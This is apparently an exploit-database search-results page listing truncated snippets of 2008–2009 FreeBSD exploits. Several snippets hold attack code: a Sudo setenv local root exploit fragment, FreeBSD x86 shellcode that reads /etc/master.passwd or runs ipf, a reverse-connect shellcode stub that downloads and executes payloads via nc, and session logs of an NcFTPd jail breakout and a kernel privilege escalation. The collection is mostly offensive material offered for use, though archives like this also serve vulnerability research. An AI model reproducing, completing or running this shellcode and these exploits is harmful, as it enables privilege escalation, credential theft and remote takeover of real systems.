25 matches found
NcFTPd <= 2.8.5 - Remote Jail Breakout Vulnerability
No description provided by source. NcFTPd = 2.8.5 remote jail breakout Discovered by: Kingcope Contact: kcope2atgooglemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFT...
Sudo <= 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit
No description provided by source. !/bin/sh Sudo = 1.6.9p18 local r00t exploit by Kingcope/2008/www.com-winner.com Most lame exploit EVER! Needs a special configuration in the sudoers file: --- Defaults setenv so environ vars are preserved : --- May also need the current users password to be type...
NcFTPD 2.8.5 Jail Breakout
NcFTPd googlemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 latest version: ftp 192.168.2.5 Connected to 192.168.2.5. 220 localhost NcFTPd Server unregister...
NcFTPd 2.8.5 - Remote Jail Breakout
NcFTPd 2.8.5 - Remote Jail Breakout NcFTPd googlemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 latest version: ftp 192.168.2.5 Connected to 192.168.2.5. 22...
NcFTPd <= 2.8.5 Remote Jail Breakout Vulnerability
Exploit for freebsd platform in category remote exploits ================================================== NcFTPd get /etc/passwd passwd local: passwd remote: /etc/passwd 502 Unimplemented command. 227 Entering Passive Mode 192,168,2,5,219,171 550 No such file. ftp ls .. 227 Entering Passive Mod...
FreeBSD/x86 - setuid(0)&execve({"//sbin/ipf","-Faa",0},0); - 57 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xo...
FreeBSD/x86 - execve(/bin/cat & /etc/master.passwd) - 65 bytes
No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation
FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code excution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when execution /bin/login, wha...
FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit
No description provided by source. FreeBSD 7.0-RELEASE telnet daemon local privilege escalation - And possible remote root code excution. There is a rather big bug in the current FreeBSD telnetd daemon. The environment is not properly sanitized when execution /bin/login, what leads to a possible...
FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit
Exploit for freebsd platform in category local exploits ==================================================================== FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit ==================================================================== FreeBSD 7.0-RELEASE telnet daemon...
FreeBSD 7/6x protosw kernel exploit
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 uname -rs FreeBSD 7.0-RELEASE id uid=1001donb gid=1001donb groups=1001donb,0wheel grep ^root /etc/master.passwd grep: /etc/master.passwd: Permission denied nm /boot/kernel/kernel | grep allproc c0bf26b8 B allproc c0bf2670 B allproclock cc -o x x.c ./x...
Sudo <= 1.6.9p18 (Defaults setenv) Local Privilege Escalation Exploit
No description provided by source. !/bin/sh Sudo = 1.6.9p18 local r00t exploit by Kingcope/2008/www.com-winner.com Most lame exploit EVER! Needs a special configuration in the sudoers file: --- "Defaults setenv" so environ vars are preserved : --- May also need the current users password to be...
Sudo 1.6.9p18 - Defaults SetEnv Local Privilege Escalation
Sudo 1.6.9p18 - Defaults SetEnv Local Privilege Escalation !/bin/sh Sudo "Defaults setenv" so environ vars are preserved : program.c include include include void init if !geteuid unsetenv"LDPRELOAD"; setgid0; setuid0; execl"/bin/sh","sh","-c","chown 0:0 /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL;...
CVE-2008-4247
ftpd in OpenBSD 4.3, FreeBSD 7.0, NetBSD 4.0, Solaris, and possibly other operating systems interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery CSRF attacks and execute arbitrary FTP commands via a long ftp:// URI...
freebsd/x86 rev connect, recv, jmp, return results 90 bytes
No description provided by source. / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 shellcodeinfile ; setuid0; socket; connect; dups; recv; jmp; exit; ; 90...
freebsd/x86 rev connect, recv, jmp, return results 90 bytes
freebsd/x86 rev connect, recv, jmp, return results 90 bytes. Shellcode exploit for freebsdx86 platform / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 pls ex...
freebsd/x86 rev connect, recv, jmp, return results 90 bytes
Exploit for freebsd/x86 platform in category shellcode =========================================================== freebsd/x86 rev connect, recv, jmp, return results 90 bytes =========================================================== / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exi...
freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes
No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes
No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes
Exploit for freebsd/x86 platform in category shellcode ============================================================ freebsd/x86 /bin/cat /etc/master.passwd NULL free 65 bytes ============================================================ ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBS...